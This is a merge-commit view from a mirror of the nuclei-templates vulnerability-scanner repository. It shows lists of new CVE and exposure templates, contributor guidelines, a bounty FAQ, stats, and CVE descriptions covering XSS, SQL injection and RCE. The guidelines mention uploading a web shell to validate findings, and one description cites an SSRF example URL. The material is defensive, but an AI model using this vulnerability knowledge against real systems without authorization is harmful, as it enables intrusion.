daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into addtimebased

patch-12
Ritik Chaddha 2024-10-18 18:30:44 +05:30 committed by GitHub
parent 3bff6352b8 6db158592a
commit 6c4d0c6e92
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
285 changed files with 8789 additions and 6232 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

105
.new-additions
View File

@ -1,69 +1,36 @@
code/cves/2024/CVE-2024-4340.yaml
code/cves/2024/CVE-2024-45409.yaml
http/cves/2017/CVE-2017-5871.yaml
http/cves/2019/CVE-2019-19411.yaml
http/cves/2021/CVE-2021-25094.yaml
http/cves/2021/CVE-2021-40272.yaml
http/cves/2023/CVE-2023-0676.yaml
http/cves/2023/CVE-2023-27641.yaml
http/cves/2023/CVE-2023-39007.yaml
http/cves/2023/CVE-2023-4151.yaml
http/cves/2023/CVE-2023-47105.yaml
http/cves/2024/CVE-2024-3234.yaml
http/cves/2024/CVE-2024-32964.yaml
http/cves/2024/CVE-2024-35627.yaml
http/cves/2024/CVE-2024-3753.yaml
http/cves/2024/CVE-2024-38816.yaml
http/cves/2024/CVE-2024-43160.yaml
http/cves/2024/CVE-2024-43917.yaml
http/cves/2024/CVE-2024-45440.yaml
http/cves/2024/CVE-2024-46627.yaml
http/cves/2024/CVE-2024-4940.yaml
http/cves/2024/CVE-2024-5488.yaml
http/cves/2024/CVE-2024-6517.yaml
http/cves/2024/CVE-2024-7354.yaml
http/cves/2024/CVE-2024-7714.yaml
http/cves/2024/CVE-2024-7854.yaml
http/cves/2024/CVE-2024-8021.yaml
http/cves/2024/CVE-2024-8877.yaml
http/cves/2024/CVE-2024-9463.yaml
http/cves/2024/CVE-2024-9465.yaml
http/default-logins/datagerry/datagerry-default-login.yaml
http/default-logins/netdisco/netdisco-default-login.yaml
http/exposed-panels/dockwatch-panel.yaml
http/exposed-panels/enablix-panel.yaml
http/exposed-panels/gitlab-explore.yaml
http/exposed-panels/gitlab-saml.yaml
http/exposed-panels/loxone-web-panel.yaml
http/exposed-panels/m-bus-panel.yaml
http/exposed-panels/macos-server-panel.yaml
http/exposed-panels/riello-netman204-panel.yaml
http/exposed-panels/rstudio-panel.yaml
http/exposed-panels/saia-pcd-panel.yaml
http/exposed-panels/workspace-one-uem-ssp.yaml
http/exposures/logs/action-controller-exception.yaml
http/exposures/logs/delphi-mvc-exception.yaml
http/exposures/logs/expression-engine-exception.yaml
http/exposures/logs/lua-runtime-error.yaml
http/exposures/logs/mako-runtime-error.yaml
http/exposures/logs/microsoft-runtime-error.yaml
http/exposures/logs/mongodb-exception-page.yaml
http/exposures/logs/sap-logon-error-message.yaml
http/exposures/logs/twig-runtime-error.yaml
http/miscellaneous/seized-site.yaml
http/misconfiguration/ariang-debug-console.yaml
http/misconfiguration/microsoft/aspnetcore-dev-env.yaml
http/misconfiguration/netdisco/netdisco-unauth.yaml
http/technologies/arcgis-detect.yaml
http/technologies/dizquetv-detect.yaml
http/technologies/ivanti-epm-detect.yaml
http/technologies/microsoft/default-azure-function-app.yaml
http/technologies/vertigis-detect.yaml
http/technologies/wiki-js-detect.yaml
http/technologies/windows-communication-foundation-detect.yaml
http/technologies/wordpress/plugins/unlimited-elements-for-elementor.yaml
http/token-spray/api-delighted.yaml
http/token-spray/api-intigriti.yaml
http/token-spray/api-telegram.yaml
http/vulnerabilities/retool/retool-svg-xss.yaml
http/vulnerabilities/wordpress/ninja-forms-xss.yaml
http/cves/2015/CVE-2015-8562.yaml
http/cves/2018/CVE-2018-7192.yaml
http/cves/2018/CVE-2018-7193.yaml
http/cves/2018/CVE-2018-7196.yaml
http/cves/2021/CVE-2021-45811.yaml
http/cves/2023/CVE-2023-1315.yaml
http/cves/2023/CVE-2023-1317.yaml
http/cves/2023/CVE-2023-1318.yaml
http/cves/2024/CVE-2024-32735.yaml
http/cves/2024/CVE-2024-32736.yaml
http/cves/2024/CVE-2024-32737.yaml
http/cves/2024/CVE-2024-32738.yaml
http/cves/2024/CVE-2024-32739.yaml
http/cves/2024/CVE-2024-39713.yaml
http/cves/2024/CVE-2024-43360.yaml
http/cves/2024/CVE-2024-44349.yaml
http/cves/2024/CVE-2024-45488.yaml
http/cves/2024/CVE-2024-46310.yaml
http/cves/2024/CVE-2024-5910.yaml
http/default-logins/zebra/zebra-printer-default-login.yaml
http/exposed-panels/freescout-panel.yaml
http/exposed-panels/paloalto-expedition-panel.yaml
http/exposed-panels/sqlpad-panel.yaml
http/exposed-panels/traccar-panel.yaml
http/exposed-panels/txadmin-panel.yaml
http/exposed-panels/usermin-panel.yaml
http/exposed-panels/veritas-netbackup-panel.yaml
http/exposed-panels/vmware-aria-panel.yaml
http/misconfiguration/root-path-disclosure.yaml
http/technologies/accellion-detect.yaml
http/technologies/mirth-connect-detect.yaml
http/technologies/oracle-fusion-detect.yaml
http/technologies/wordpress/plugins/burst-statistics.yaml
http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml
http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml
passive/cves/2024/CVE-2024-40711.yaml

1
CONTRIBUTING.md
View File

@ -56,6 +56,7 @@ Along with the P.O.C following are the required fields in the info section for s
- If there are more than 1 template for a tech create a separate folder for it
- Don't share any vulnerable URL publicly on Github or Discord channel.
- We should only upload a web shell as a last resort to validate the vulnerability, and if we do upload a file, make sure the file name is random(`{{randstr}}`)
- Do not include code templates for exploits that can be written using HTTP or JavaScript. We avoid adding additional exploit code to the project unless there is an exception.
### **Submitting a PR**

75
Community-Rewards-FAQ.md Normal file
View File

@ -0,0 +1,75 @@
# Nuclei Templates Community Rewards Program - FAQ
## What is the purpose of this rewards program?
The program is designed to reward the community for their efforts in contributing high-quality templates for critical and trending vulnerabilities.
## What are the bounty ranges for template submissions?
Bounties range from **$50 to $250**, depending on the complexity of the template and the effort required.
## Where can I find bounty issues?
Only issues listed by us on our GitHub repository with the 💎 **Bounty** label are eligible for rewards. You can find these bounty issues [here](https://github.com/projectdiscovery/nuclei-templates/issues?q=is%3Aissue%20state%3Aopen%20label%3A%22%F0%9F%92%8E%20Bounty%22)
## What is the acceptance criteria for templates?
Templates must meet the following criteria:
1. **Complete POC**: A full Proof of Concept (POC) must be provided and not rely solely on version detection.
2. **Debug Data**: Include debug data to assist with template validation.
3. **Validation Required**: The template will be reviewed and validated before rewards are given.
4. **Accurate Matchers**: Use strong matchers to avoid false positives.
> **Note**: Triagers will make the final decision on whether a template qualifies for a reward based on validation and the acceptance criteria outlined.
## How do I start working on a bounty issue?
1. **Find an Issue**: Look for issues tagged with 💎 **Bounty**.
2. **Declare Work**: Comment with `/attempt #<issue_number>` to claim the issue.
3. **Submit Work**: Submit your pull request with `/claim #<issue_number>` in the PR description when ready.
## How often are new bounty issues added?
We add new bounty issues on a **weekly basis**, so make sure to check back regularly for fresh opportunities. In the future, you can expect many more bounty issues as the program expands, allowing more opportunities for contributors to participate and earn rewards.
## Can I collaborate with others?
Yes, you can collaborate with other contributors and split rewards by commenting:
```
/claim #<issue_number>
/split @contributor1
/split @contributor2
```
## Is there a limit to how many issues I can work on?
You can work on up to **3 issues** simultaneously.
## What happens if I dont complete an issue on time?
Issues must be completed within **2 months**, or they will be closed.
## How are rewards distributed?
Rewards are distributed once the template is fully validated. If the issue remains unresolved for **few weeks**, the bounty may increase.
## What should I include in my template submission?
Include the following:
- **Complete POC**: A working Proof of Concept.
- **Matchers**: Multiple matchers to prevent false positives.
- **Debug Data**: Data to assist the triage team in validation.
- **Metadata**: Include required fields like `id`, `name`, `author`, `severity`, `description`, and `reference`.
## What types of templates will be rejected?
Templates may be rejected if they:
- Rely solely on version detection.
- Lack a complete POC.
- Contain weak matchers or redundant changes to existing templates.
## What should I avoid when submitting a template?
- Avoid sharing real-world targets publicly.
- Dont submit templates with weak matchers.
- Avoid unnecessary changes to existing templates.
## Is there a leaderboard for contributors?
Yes! We now have a **leaderboard** that showcases top contributors. You can check it out here: [Leaderboard](https://cloud.projectdiscovery.io/templates/leaderboard).
## Is this program permanent?
The rewards program is currently a test run, but we may make changes based on community feedback.
## What additional rewards are available besides bounties?
Beyond bounties, we also reward contributors with:
- **Swag** such as t-shirts and stickers.
- **Invites to security conferences** for standout contributors.
- **Stickers** as a token of appreciation for all first-time contributors, regardless of the bounty.
> Contributors who feel their pull request or issue was overlooked for first-time contributor stickers can ping us on our Discord for assistance: [ProjectDiscovery Discord](https://discord.com/invite/projectdiscovery).

20
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2743 | dhiyaneshdk | 1397 | http | 7977 | info | 3855 | file | 402 |
| panel | 1201 | daffainfo | 866 | file | 402 | high | 2033 | dns | 25 |
| wordpress | 1035 | dwisiswant0 | 802 | cloud | 325 | medium | 1727 | | |
| exposure | 994 | princechaddha | 497 | workflows | 192 | critical | 1145 | | |
| xss | 945 | pussycat0x | 451 | network | 137 | low | 279 | | |
| wp-plugin | 904 | ritikchaddha | 445 | code | 82 | unknown | 43 | | |
| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 |
| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 |
| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | |
| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | |
| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | |
| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
| tech | 722 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 712 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 710 | geeknik | 231 | dns | 22 | | | | |
| tech | 729 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 713 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 713 | geeknik | 231 | dns | 22 | | | | |
**718 directories, 9584 files**.
**723 directories, 9654 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

11627
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

18
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2743 | dhiyaneshdk | 1397 | http | 7977 | info | 3855 | file | 402 |
| panel | 1201 | daffainfo | 866 | file | 402 | high | 2033 | dns | 25 |
| wordpress | 1035 | dwisiswant0 | 802 | cloud | 325 | medium | 1727 | | |
| exposure | 994 | princechaddha | 497 | workflows | 192 | critical | 1145 | | |
| xss | 945 | pussycat0x | 451 | network | 137 | low | 279 | | |
| wp-plugin | 904 | ritikchaddha | 445 | code | 82 | unknown | 43 | | |
| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 |
| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 |
| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | |
| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | |
| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | |
| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
| tech | 722 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 712 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 710 | geeknik | 231 | dns | 22 | | | | |
| tech | 729 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 713 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 713 | geeknik | 231 | dns | 22 | | | | |

4
cloud/aws/iam/iam-user-password-change.yaml
View File

@ -20,10 +20,10 @@ code:
matchers:
- type: word
words:
- "true"
- "false"
extractors:
- type: dsl
dsl:
- '"AllowUsersToChangePassword Policy is not enabled in your AWS account"'
# digest: 4b0a00483046022100b046545d3c72c54dee9c4051661d61c8241cbce1fb0f655fa4bb1e8461b3f295022100a7bb33ba3ddff07e68db9bd748802715215b8d62be69ab27fab22c5e539cbb28:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100a110f462d8f5e4466b712fd0e894e70d3f25a2880789f42656e9a234f347f0ed022100c3b0fa07fb3f150db61f3c0715c8197371d98a9b4fe21f2837c2243ceb33b064:922c64590222798bb761d5b6d8e72950

24
contributors.json
View File

@ -1438,7 +1438,8 @@
"website": "https://pwn.by/noraj",
"email": ""
}
},{
},
{
"author": "mabdullah22",
"links": {
"github": "https://www.github.com/maabdullah22",
@ -1447,5 +1448,26 @@
"website": "",
"email": ""
}
},
{
"author": "rxerium",
"links": {
"github": "https://www.github.com/rxerium",
"twitter": "https://twitter.com/rxerium",
"linkedin": "",
"website": "https://rxerium.com",
"email": "rishi@rxerium.com"
}
},
{
"author": "edoardottt",
"links": {
"github": "https://github.com/edoardottt",
"twitter": "https://twitter.com/edoardottt2",
"linkedin": "https://www.linkedin.com/in/edoardoottavianelli/",
"website": "https://edoardoottavianelli.it/",
"email": ""
}
}
]

18
cves.json
View File

@ -317,6 +317,7 @@
{"ID":"CVE-2015-7823","Info":{"Name":"Kentico CMS 8.2 - Open Redirect","Severity":"medium","Description":"Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2015/CVE-2015-7823.yaml"}
{"ID":"CVE-2015-8349","Info":{"Name":"SourceBans \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-8349.yaml"}
{"ID":"CVE-2015-8399","Info":{"Name":"Atlassian Confluence \u003c5.8.17 - Information Disclosure","Severity":"medium","Description":"Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-8399.yaml"}
{"ID":"CVE-2015-8562","Info":{"Name":"Joomla HTTP Header Unauthenticated - Remote Code Execution","Severity":"high","Description":"Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-8562.yaml"}
{"ID":"CVE-2015-8813","Info":{"Name":"Umbraco \u003c7.4.0- Server-Side Request Forgery","Severity":"high","Description":"Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2015/CVE-2015-8813.yaml"}
{"ID":"CVE-2015-9312","Info":{"Name":"NewStatPress \u003c=1.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file \"includes/nsp_search.php\", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-9312.yaml"}
{"ID":"CVE-2015-9323","Info":{"Name":"404 to 301 \u003c= 2.0.2 - Authenticated Blind SQL Injection","Severity":"critical","Description":"The 404 to 301 Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-9323.yaml"}
@ -628,6 +629,9 @@
{"ID":"CVE-2018-6530","Info":{"Name":"D-Link - Unauthenticated Remote Code Execution","Severity":"critical","Description":"OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6530.yaml"}
{"ID":"CVE-2018-6605","Info":{"Name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6605.yaml"}
{"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"}
{"ID":"CVE-2018-7192","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /ajax.php/form/help-topic in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"message\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7192.yaml"}
{"ID":"CVE-2018-7193","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /scp/directory.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"order\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7193.yaml"}
{"ID":"CVE-2018-7196","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /scp/index.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"sort\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7196.yaml"}
{"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"}
{"ID":"CVE-2018-7282","Info":{"Name":"TITool PrintMonitor - Blind SQL Injection","Severity":"critical","Description":"The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7282.yaml"}
{"ID":"CVE-2018-7314","Info":{"Name":"Joomla! Component PrayerCenter 3.0.2 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7314.yaml"}
@ -1501,6 +1505,7 @@
{"ID":"CVE-2021-45382","Info":{"Name":"D-Link - Remote Command Execution","Severity":"critical","Description":"A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45382.yaml"}
{"ID":"CVE-2021-45422","Info":{"Name":"Reprise License Manager 14.2 - Cross-Site Scripting","Severity":"medium","Description":"Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process \"count\" parameter via GET.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-45422.yaml"}
{"ID":"CVE-2021-45428","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45428.yaml"}
{"ID":"CVE-2021-45811","Info":{"Name":"osTicket 1.15.x - SQL Injection","Severity":"medium","Description":"A SQL injection vulnerability in the \"Search\" functionality of \"tickets.php\" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the \"keywords\" and \"topic_id\" URL parameters combination.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-45811.yaml"}
{"ID":"CVE-2021-45967","Info":{"Name":"Pascom CPS Server-Side Request Forgery","Severity":"critical","Description":"Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45967.yaml"}
{"ID":"CVE-2021-45968","Info":{"Name":"Pascom CPS - Local File Inclusion","Severity":"high","Description":"Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-45968.yaml"}
{"ID":"CVE-2021-46005","Info":{"Name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","Severity":"medium","Description":"Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-46005.yaml"}
@ -2020,6 +2025,9 @@
{"ID":"CVE-2023-1080","Info":{"Name":"WordPress GN Publisher \u003c1.5.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1080.yaml"}
{"ID":"CVE-2023-1177","Info":{"Name":"Mlflow \u003c2.2.1 - Local File Inclusion","Severity":"critical","Description":"Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1177.yaml"}
{"ID":"CVE-2023-1263","Info":{"Name":"Coming Soon \u0026 Maintenance \u003c 4.1.7 - Unauthenticated Post/Page Access","Severity":"medium","Description":"The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-1263.yaml"}
{"ID":"CVE-2023-1315","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1315.yaml"}
{"ID":"CVE-2023-1317","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1317.yaml"}
{"ID":"CVE-2023-1318","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Generic in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1318.yaml"}
{"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"}
{"ID":"CVE-2023-1408","Info":{"Name":"Video List Manager \u003c= 1.7 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-1408.yaml"}
{"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"}
@ -2529,6 +2537,11 @@
{"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"}
{"ID":"CVE-2024-32709","Info":{"Name":"WP-Recall \u003c= 16.26.5 - SQL Injection","Severity":"critical","Description":"The WP-Recall Registration, Profile, Commerce \u0026 More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-32709.yaml"}
{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
{"ID":"CVE-2024-32735","Info":{"Name":"CyberPower - Missing Authentication","Severity":"critical","Description":"An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-32735.yaml"}
{"ID":"CVE-2024-32736","Info":{"Name":"CyberPower \u003c v2.8.3 - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to .\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32736.yaml"}
{"ID":"CVE-2024-32737","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32737.yaml"}
{"ID":"CVE-2024-32738","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32738.yaml"}
{"ID":"CVE-2024-32739","Info":{"Name":"CyberPower \u003c v2.8.3 - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32739.yaml"}
{"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"}
